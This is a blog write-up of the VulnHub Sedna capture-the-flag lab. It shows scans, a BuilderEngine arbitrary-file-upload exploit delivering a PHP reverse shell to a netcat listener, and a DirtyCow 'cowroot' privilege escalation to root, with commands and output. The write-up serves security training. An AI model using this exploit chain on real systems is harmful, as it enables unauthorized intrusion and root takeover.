VulnHub Sedna Solution

      No Comments on VulnHub Sedna Solution

For background information on this series of CTFs you may want to read this page. Or if your just after my solution please keep reading.



This is the second of 3 incrementally difficult CTF’s created for HackFest 2016 by @ViperBlackSkull and released on the VulnHub platform.

Link –,181/

Difficulty –Medium

My Solution

As always start with an NMAP Scan to see what ports are open.

Scanning [65535 ports]
Discovered open port 139/tcp on
Discovered open port 22/tcp on
Discovered open port 993/tcp on
Discovered open port 445/tcp on
Discovered open port 80/tcp on
Discovered open port 110/tcp on
Discovered open port 111/tcp on
Discovered open port 8080/tcp on
Discovered open port 995/tcp on
Discovered open port 53/tcp on
Discovered open port 143/tcp on
Discovered open port 46965/tcp on

It looks very similar to the previous challenge. so i head straight to port 80.

Same opening page with no other clues, so i start a nikto scan.

root@kali:~/Desktop# nikto -h
- Nikto v2.1.6
+ Target IP:
+ Target Hostname:
+ Target Port:        80
+ Start Time:         2017-04-09 14:42:03 (GMT1)
+ Server: Apache/2.4.7 (Ubuntu)
+ Server leaks inodes via ETags, header found with file /, fields: 0x65 0x53fb059bb5bc8 
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ "robots.txt" contains 1 entry which should be manually viewed.
+ Apache/2.4.7 appears to be outdated (current is at least Apache/2.4.12). Apache 2.0.65 (final release) and 2.2.29 are also current.
+ Allowed HTTP Methods: GET, HEAD, POST, OPTIONS 
+ OSVDB-3268: /files/: Directory indexing found.
+ OSVDB-3092: /files/: This might be interesting...
+ OSVDB-3092: /system/: This might be interesting...
+ OSVDB-3233: /icons/README: Apache default file found.
+ OSVDB-3092: /license.txt: License file found may identify site software.
+ 7537 requests: 0 error(s) and 12 item(s) reported on remote host
+ End Time:           2017-04-09 14:42:43 (GMT1) (40 seconds)
+ 1 host(s) tested

Looking at license.txt reveals a potential name of some installed software.

Copyright (c) 2012 – 2015 BuilderEngine / Radian Enterprise Systems Limited.

And searchsploit shows a potential file upload vulnerability

root@kali:~/Desktop# searchsploit builderengine
------------------------------------------------------------------------------------------------------------------------ ----------------------------------
 Exploit Title                                                                                                          |  Path
                                                                                                                        | (/usr/share/exploitdb/platforms/)
------------------------------------------------------------------------------------------------------------------------ ----------------------------------
BuilderEngine 3.5.0 - Arbitrary File Upload                                                                             | php/webapps/40390.php
------------------------------------------------------------------------------------------------------------------------ ----------------------------------

Its a basic php upload form. I spin up Apache on kali and copy the file in to the webroot, edit the form action on the php page to point at the Sedna IP and open the page on my localhost.

I give the upload form the php reverse shell from pentest monkey and i get a json response that confirms my upload and tells me where to find my file.


Start a netcat listener, visit the remote page, ‘’,  in a browser window and with any luck get a shell back.

root@kali:~/VulnHub/sedna# cp 40390.php /var/www/html/
root@kali:~/VulnHub/sedna# nano /var/www/html/40390.php 
root@kali:~/VulnHub/sedna# nc -l -vv -p 1234
listening on [any] 1234 ... inverse host lookup failed: Unknown host
connect to [] from (UNKNOWN) [] 33701
Linux Sedna 3.13.0-32-generic #57-Ubuntu SMP Tue Jul 15 03:51:12 UTC 2014 i686 athlon i686 GNU/Linux
 09:54:25 up 18 min,  0 users,  load average: 0.00, 0.01, 0.05
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off

Then in to my usual hands on routine:

  1. Spawn a tty shell
  2. file listing to web root
  3. Search for flags
  4. upload linux enumeration script.
$ python -c 'import pty; pty.spawn("/bin/bash")'
www-data@Sedna:/$ ls /var/www/ 
ls /var/www/
flag.txt  html
www-data@Sedna:/$ find / > /var/www/html/dirs.txt
www-data@Sedna:/$ grep flag.txt /var/www/html/dirs.txt
grep flag.txt /var/www/html/dirs.txt
www-data@Sedna:/$ cat /var/www/flag.txt
cat /var/www/flag.txt

I used the same uploader we used to push the shell up to push my favorite enum script from highoncoffee

www-data@Sedna:/$ cd /var/www/html/files/
cd /var/www/html/files/
www-data@Sedna:/var/www/html/files$ ls
be_demo        captcha		    loading.gif  users
blogimage.jpg  shell.php
www-data@Sedna:/var/www/html/files$ chmod +x
chmod +x
www-data@Sedna:/var/www/html/files$ ./ > enum.txt
./ > enum.txt

Looking through the output nothing big jumps out but the uname output shows us this is runnign an old version of Ubuntu

Linux Sedna 3.13.0-32-generic #57-Ubuntu SMP Tue Jul 15 03:51:12 UTC 2014 i686 athlon i686 GNU/Linux

Searching for ‘Linux 3.13 exploits’ revealed a few possible solutions. After trying and failing with the overlayfs exploit i tried Dirty Cow a privilege escalation vulnerability that affected a wide range of versions. There are plenty of POC’s on the website.

I took a copy of cowroot from and configured it for x86 by commenting out the other payload.

Transferred it to the target then as per the instructions compiled and executed it.

--2017-04-09 11:57:40--
Connecting to connected.
HTTP request sent, awaiting response... 200 OK
Length: 4966 (4.8K) [text/plain]
Saving to: 'cowroot.c'

100%[======================================>] 4,966       --.-K/s   in 0.001s  

2017-04-09 11:57:40 (6.26 MB/s) - 'cowroot.c' saved [4966/4966]

www-data@Sedna:/tmp$ gcc cowroot.c -o cowroot -pthread
gcc cowroot.c -o cowroot -pthread
cowroot.c: In function 'procselfmemThread':
cowroot.c:99:9: warning: passing argument 2 of 'lseek' makes integer from pointer without a cast [enabled by default]
In file included from cowroot.c:28:0:
/usr/include/unistd.h:334:16: note: expected '__off_t' but argument is of type 'void *'
 extern __off_t lseek (int __fd, __off_t __offset, int __whence) __THROW;
cowroot.c: In function 'main':
cowroot.c:142:5: warning: format '%d' expects argument of type 'int', but argument 2 has type '__off_t' [-Wformat=]
     printf("Size of binary: %d\n", st.st_size);
www-data@Sedna:/tmp$ ./cowroot
DirtyCow root privilege escalation
Backing up /usr/bin/passwd.. to /tmp/bak
Size of binary: 45420
Racing, this may take a while..
thread stopped
/usr/bin/passwd is overwritten
Popping root shell.
Don't forget to restore /tmp/bak
thread stopped

This worked for a second then died. I ended up having to restart the VM manually. After reading the thread on the exploit page i noticed that it had some stability issues. These could be overcome by issuing a single line after the exploit completed.

echo 0 > /proc/sys/vm/dirty_writeback_centisecs

So i tried again and this time immediately entered the new command. Success :) A stable root shell.

I followed the instructions and restored /etc/passwd for future use and then grab the root flag.

root@Sedna:/tmp# echo 0 > /proc/sys/vm/dirty_writeback_centisecs
echo 0 > /proc/sys/vm/dirty_writeback_centisecs
root@Sedna:/tmp# mv /tmp/bak /etc/passwd
mv /tmp/bak /etc/passwd
root@Sedna:/tmp# ls /root/
ls /root/  chkrootkit  flag.txt
root@Sedna:/tmp# cat /root/flag.txt
cat /root/flag.txt

Job complete on to the next one.

As usual Questions, Queries, Comments below.